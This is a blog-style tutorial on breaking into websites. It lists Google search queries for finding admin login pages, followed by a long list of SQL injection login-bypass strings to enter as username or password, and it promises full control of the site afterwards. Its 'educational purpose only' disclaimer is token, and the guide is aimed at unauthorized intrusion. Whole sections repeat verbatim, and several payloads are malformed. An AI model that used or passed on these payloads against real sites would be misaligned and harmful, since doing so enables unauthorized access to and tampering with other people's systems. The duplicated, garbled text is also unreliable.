 |
| How to hack websites using sql injection |
Note :- This is for educational purpose only and i am not responsible for any trouble you got by using this trick.
HOW TO HACK WEBSITES USING SQL INJECTION
First you have to search the admin page of vulnerable web site. For searching vulnerable web page you have to take the help of google . Open your google page and use following script.
Use any one of the following…
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
“inurl: admin.php”
“inurl: login/admin.php”
“inurl: admin/login.php”
“inurl: adminlogin.php”
“inurl: adminhome.php”
“inurl: admin_login.php”
“inurl: administratorlogin.php”
“inurl: login/administrator.php”
“inurl: administrator_login.php”
HOW TO HACK WEBSITES USING SQL INJECTION
First you have to search the admin page of vulnerable web site. For searching vulnerable web page you have to take the help of google . Open your google page and use following script.
Use any one of the following…
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
“inurl: admin.php”
“inurl: login/admin.php”
“inurl: admin/login.php”
“inurl: adminlogin.php”
“inurl: adminhome.php”
“inurl: admin_login.php”
“inurl: administratorlogin.php”
“inurl: login/administrator.php”
“inurl: administrator_login.php”
Now you can use the following code and inject into user id and password field.
For user id used admin as user id.
And in password field use one one of the following code and some times these codes are also used for both user id as well as password.
test’or1–
‘or 1=1#
1’or’1’=’1
‘)or1=1—
‘or ” = ‘
‘or’1’=’1
‘ or ‘1’=’1
‘ or ‘x’=’x
‘ or 0=0 —
” or 0=0 —
or 0=0 —
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 —
hi’ or 1=1 —
‘or’1=1’
‘or’ ‘=’
After injecting following code click submit. Here you go,you successfully login into admin page now you can do any modification or change in this website.
For user id used admin as user id.
And in password field use one one of the following code and some times these codes are also used for both user id as well as password.
test’or1–
‘or 1=1#
1’or’1’=’1
‘)or1=1—
‘or ” = ‘
‘or’1’=’1
‘ or ‘1’=’1
‘ or ‘x’=’x
‘ or 0=0 —
” or 0=0 —
or 0=0 —
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 —
hi’ or 1=1 —
‘or’1=1’
‘or’ ‘=’
After injecting following code click submit. Here you go,you successfully login into admin page now you can do any modification or change in this website.
No comments:
Write comments